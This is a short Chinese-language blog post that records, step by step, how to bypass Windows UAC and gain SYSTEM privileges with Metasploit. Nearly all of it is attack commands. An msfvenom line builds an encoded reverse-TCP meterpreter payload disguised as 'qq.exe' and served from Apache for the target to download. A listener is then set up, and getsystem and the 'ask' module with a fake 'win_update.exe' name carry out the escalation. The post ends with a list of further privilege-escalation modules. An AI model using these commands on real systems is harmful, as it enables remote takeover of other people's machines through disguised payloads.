绕过uac提权 比较简单,做个步骤记录
1. 生成exe远控文件 1 2 3 4 5 6 7 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.2.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o /opt/qq.exe -b 避免出现的字符 -e 编码器 -i 编码次数 -f 输出的文件类型 -o 输出路径
2. 将exe文件上传到目标机 开启apache服务
1 2 service apache2 start cp /opt /qq.exe /var/www/html
3. 目标机访问并下载 4. msfconsole 1 2 3 4 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost ip exploit
5. 运行exe文件 此时,会返回一个session会话
进入它进行提权
1 2 3 sessions -i 1 load priv getsystem
6. getsystem失败 1 2 3 4 5 use exploit/windows/local/ask --进入提权模块 set lhost ip set filename win_update.exe set session 1 exploit
7. 再获得一个session 1 2 3 sessions -i 2 load priv getsystem
8. 提权成功 1 2 shell --获取shell whoami --查看当前用户,为system
9. 总结 其他提权模块
1 2 3 4 5 6 7 8 9 use exploit/windows/local/bypassuac_injection use exploit/windows/local/ms13_053_schlamperei use exploit/windows/local/ppr_flatten_rec use exploit/windows/local/ms13_081_track_popup_menu use exploit/windows/local/ms13_097_ie_registry_symlink
If you like this blog or find it useful for you, you are welcome to comment on it. You are also welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them. Thank you !